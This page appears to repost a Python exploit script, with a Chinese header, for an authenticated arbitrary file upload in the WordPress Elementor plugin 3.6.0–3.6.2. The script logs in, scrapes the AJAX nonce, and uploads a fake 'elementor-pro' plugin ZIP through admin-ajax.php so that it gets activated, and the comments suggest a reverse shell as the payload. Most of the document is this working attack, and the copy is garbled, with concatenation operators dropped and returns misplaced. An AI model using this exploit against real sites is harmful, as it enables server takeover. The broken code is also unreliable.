WordPress Plugin Elementor 3.6.2 - 远程代码执行(RCE)

2022-04-21 11:51:18 浏览数 (1)

# 供应​​商主页:https://elementor.com/

# 软件链接:https://wordpress.org/plugins/elementor/advanced/(向下滚动选择版本)

# 版本:3.6.0、3.6.1、3.62

# 测试:WordPress 5.9.3(独立于操作系统,因为此漏洞不提供有效负载)

import requests
import re

# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.

# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
# The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
# At the end of this file you can find this code:
#	add_action( 'admin_init', function() {
#			if ( wp_doing_ajax() &&
#				isset( $_POST['action'] ) &&
#				isset( $_POST['_nonce'] ) &&
#				wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
#			) {
#				$this->maybe_handle_ajax();
#			}
#		} );
# This code is triggered whenever ANY user account visits /wp-admin
# In order to work we need the following 4 things:
# 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
# 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
# 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function)
# 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
# The file we upload must have the following structure:
# 1. It must be a ZIP file. You can name it as you want.
# 2. It must contain a folder called "elementor-pro"
# 3. This folder must contain a file named "elementor-pro.php"
# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
# In order to prevent this, I suggest you to use some variable to activate the payload.
# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
# if (!isset($_GET['activate']))
#	return;

# Change the following 4 variables:
payloadFileName = 'elementor-pro.zip' # Change this with the path of the ZIP archive that contains your payload
baseUrl = '' # Change this with the base url of the target
username = 'guest' # Change this with the username you want to use to log in
password = 'test' # Change this with the password you want to use to log in
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

session = requests.Session()
cookies = { 'wordpress_test_cookie' : 'WP Cookie check' } # WordPress needs this to tell if browser can manage cookies

def DoLogin(username, password):
	global cookies
	loginUrl = baseUrl   'wp-login.php'
	adminUrl = baseUrl   'wp-admin/'
	data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }
	# search for: "ajax":{"url":"http://baseUrl/wp-admin/admin-ajax.php","nonce":"4e8878bdba"}
	# 4e8878bdba is just an example of nonce. It can be anything else.
	regexp = re.compile('"ajax":\{"url":". admin\-ajax\.php","nonce":"(. )"\}') 
	response = session.post(loginUrl, cookies=cookies, data=data)

	search = regexp.search(response.text)

	if not search:
		# I've tested this on WordPress v. 5.9.3
		# Fix the regexp if needed.
		print('Error - Invalid credentials?')
		return search.group(1)

def UploadFile(fileName, nonce):
	uploadUrl = baseUrl   'wp-admin/admin-ajax.php'
	data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
	files = { 'fileToUpload' : open(fileName, 'rb') }
	regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true
	response = session.post(uploadUrl, data=data, files=files)

	search = regexp.search(response.text)

	if not search:
		# If Elemento Pro is already installed, the upload will fail.
		# You can print the response to investigate further
		print ('Error - Upload failed')
		# print (response.text)
		return False
		print ('Upload completed successfully!')
		return True

# Define YOUR method to activate your payload (if needed)
def ActivatePayload():
	payloadUrl = baseUrl   'index.php?activate=1'

print('Trying to login...')
nonce = DoLogin(username, password)
print('Nonce found: '   nonce)

print('Uploading payload...')
fileUploaded = UploadFile(payloadFileName, nonce)

# Define YOUR method to activate your payload (if needed)
if fileUploaded:
	print ('Activating payload...')

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